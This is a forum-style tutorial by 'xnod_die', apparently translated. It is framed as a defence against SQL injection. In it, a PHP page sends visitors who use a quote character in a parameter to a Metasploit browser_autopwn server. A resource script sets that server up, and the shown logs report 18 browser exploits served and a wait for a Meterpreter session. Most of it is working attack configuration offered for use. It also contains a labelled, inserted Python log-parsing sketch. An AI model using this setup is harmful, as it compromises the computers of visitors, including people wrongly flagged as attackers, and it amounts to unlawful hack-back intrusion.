Hello all. This time I want to share how to ward off an SQLi attack on a website using Metasploit.
Most attackers use Windows.
Well, this is an opportunity for us to counterattack.
Let's get straight to it, and sorry if this is a repost.
Create a script, index.php:
CODE :
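<?php
// The start of this condition is cut off in the post; a check for a single
// quote in xnod is assumed here, matching the logged hit on ?xnod=6%27.
if (isset($_GET['xnod']) && preg_match("/'/", $_GET['xnod'])) {
    header('Location: http://192.168.1.100:4444');
    exit;
}
?>
<html>
<body>
Silahkan dicoba
<a href="?xnod=2">test 1</a> - <a href="?xnod=2">test 2</a> - <a href="?xnod=6">test 3</a>
</body>
</html>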
OK, now let's write a resource script to make Metasploit easier to use.
Name it antisqli.rc.
Code:
# cat <<EOF > antisqli.rc
> use auxiliary/server/browser_autopwn
> set LHOST 192.168.100
> set SRVPORT 4444
> set URIPATH /
> run
> EOF
Now we run it with Metasploit and wait for the attacker, while drinking coffee and eating something fried.
./msfconsole -q -r antisqli.rc
Wait until a log entry like this appears:
Code:
192.168.1.5:1205 [302]: /?xnod=6%27
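Added example (not from the original post): a Python sketch that picks probes like the one logged above out of a request log and counts them per source address. It assumes log lines in the `ip:port [status]: path` shape shown above and that `xnod` is meant to hold a plain integer; the sample lines and all function names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs, unquote

# Shape of the log line shown in the post: "192.168.1.5:1205 [302]: /?xnod=6%27"
LINE_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):\d+ \[(?P<status>\d{3})\]: (?P<path>\S+)$"
)
INT_RE = re.compile(r"[0-9]{1,10}")  # assumption: xnod is a small unsigned integer

# Constructed sample lines; only the first mirrors the line in the post.
SAMPLE_LOG = """\
192.168.1.5:1205 [302]: /?xnod=6%27
192.168.1.7:4410 [200]: /?xnod=2
192.168.1.5:1206 [302]: /?xnod=6%2527%20OR%201=1
192.168.1.9:5120 [200]: /?xnod=6+union+select+1
192.168.1.7:4411 [200]: /
"""

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so a double-encoded quote (%2527) is seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_probe(path, param="xnod"):
    """True when the parameter is present but is not a plain integer."""
    query = urlsplit(path).query
    values = parse_qs(query, keep_blank_values=True).get(param, [])
    return any(not INT_RE.fullmatch(decode_fully(v)) for v in values)

def probes_by_source(log_text):
    """Count suspicious requests per client IP; unparseable lines are skipped."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m and is_probe(m.group("path")):
            hits[m.group("ip")] += 1
    return hits

if __name__ == "__main__":
    for ip, count in probes_by_source(SAMPLE_LOG).most_common():
        print(f"{ip}: {count} suspicious request(s)")
```

Validating against the expected type (an integer) rather than matching quote characters also catches probes that contain no quote at all, such as the `union select` line in the sample.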
After a long wait, there is finally a hit:
Code:
msf auxiliary(browser_autopwn) >
[*] 192.168.1.5 browser_autopwn - Handling '/'
[*] 192.168.1.5 browser_autopwn - Handling '/?sessid=TWljcm9zb2Z0IFdpbmRvd3M6Nzp1bmRlZmluZWQ6ZW4tVVM6eDg2OkZpcmVmb3g6MTIuMDo%3d'
[*] 192.168.1.5 browser_autopwn - JavaScript Report: Microsoft Windows:7:undefined:en-US:x86:Firefox:12.0:
[*] 192.168.1.5 browser_autopwn - Responding with 18 exploits
Wait for the Meterpreter session to show up; after that, it's up to you.
Regards, xnod_die